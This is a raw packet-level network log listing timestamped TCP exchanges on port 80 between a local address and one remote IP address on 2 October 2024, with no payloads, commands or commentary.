Oct 2, 2024 23:10:12.513901949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.514702082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.514753103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.514885902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.514898062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.514905930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.514914989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.514938116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.514961004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.515253067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.515265942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.515274048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.515285969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.515295029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.515305042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.515307903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.515326023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.515346050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.516562939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.516576052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.516585112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.516618967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.516628027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.516701937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.516711950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.516753912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.585958004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.586025953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.586121082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.586133003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.586177111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.586272001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.586282015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.586323977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.586574078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.586626053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.586730003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.586740971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.586781025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.587049961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.587060928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.587070942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.587081909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.587093115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.587100983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.587115049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.587132931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.587950945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.587963104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.588004112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.588118076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.588130951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.588140011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.588150978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.588170052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.588181973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.589046955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.589057922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.589067936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.589080095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.589088917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.589099884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.589101076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.589107037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.589129925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.589148045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.589961052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.589971066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590014935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.590106010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590116024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590123892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590133905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590152025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.590163946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.590775967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590786934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590795994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590826988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.590837002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.590934038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590944052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590951920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.590981007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.590996981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.591805935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.591818094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.591825962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.591835022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.591845989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.591859102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.591875076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.591886997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.592797995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.592809916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.592818022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.592825890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.592834949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.592854023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.592863083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.592873096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.592895985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.593621969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.593636036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.593679905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.593780041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.593789101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.593796968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.593830109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.593841076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.594549894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.594568014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.594607115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.594706059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.594717979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.594726086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.594734907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.594753981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.594763041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.595499992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595514059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595525026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595534086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595541954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595551014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595556974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.595568895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595570087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.595580101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595587015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.595587969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595598936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595607042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595617056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595617056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.595624924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.595638990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.595659971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.596903086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.596914053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.596923113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.596930981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.596955061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.596965075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.597047091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.597091913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.597105980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.597152948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.597934961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.597948074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.597955942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.597965956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.597975016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.597984076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.597985983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.597995043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.598026037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.598079920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.598119020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.598918915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.598928928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.598937988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.598947048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.598957062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.598989964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.599011898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.599060059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.599070072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.599104881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.599730968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.599742889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.599750996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.599760056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.599769115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.599778891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.599782944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.599796057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.599813938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.600723028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.600733995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.600742102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.600752115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.600760937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.600769997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.600775003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.600780010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.600785971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.600805044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.600814104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.601758957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.601807117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.601962090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.601973057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.601982117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.601990938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.602006912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.602032900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.671360016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.671372890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.671381950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.671542883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.671552896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.671559095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.671561003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.671559095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.671570063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.671587944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.671593904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.671621084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.671850920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.671996117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.672044992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672095060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.672112942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672122955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672131062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672152042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.672162056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.672678947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672689915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672698975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672707081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672715902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672724962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.672727108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.672739029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.672758102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.672772884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.673469067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.673480034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.673489094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.673497915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.673506975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.673517942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.673517942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.673537970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.673547029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.673566103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.674283028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674294949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674304008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674312115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674320936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674334049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.674350023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.674901009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674911976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674921036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674930096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674940109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674948931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.674951077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.674962997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.674971104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.674993038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.675839901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.675853014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.675862074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.675878048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.675885916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.675889969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.675895929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.675905943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.675909996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.675916910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.675940990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.676788092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.676800013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.676809072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.676817894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.676826954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.676839113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.676850080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.676868916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.715786934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.722733021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.941447973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.941473007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.941477060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.941595078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.941653967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.941672087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.941684961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.941694975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.941713095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.941742897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.942220926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.942233086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.942244053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.942253113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.942284107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.942301035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.942708969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.942719936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.942728996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.942738056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.942749023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.942759037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.942785025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.942800045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.943320036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.943331003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.943340063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.943351030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.943360090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.943368912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.943377972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.943381071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.943401098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.943408966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.943427086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.943449974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.944143057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944154978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944164038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944173098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944181919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944197893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944197893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.944226027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.944267035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.944875002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944885969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944895029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944904089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944914103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944922924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944928885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.944933891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.944958925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.944977999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.945853949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.945866108 CEST	80	49704	185.215.113.37	192.168.2.5
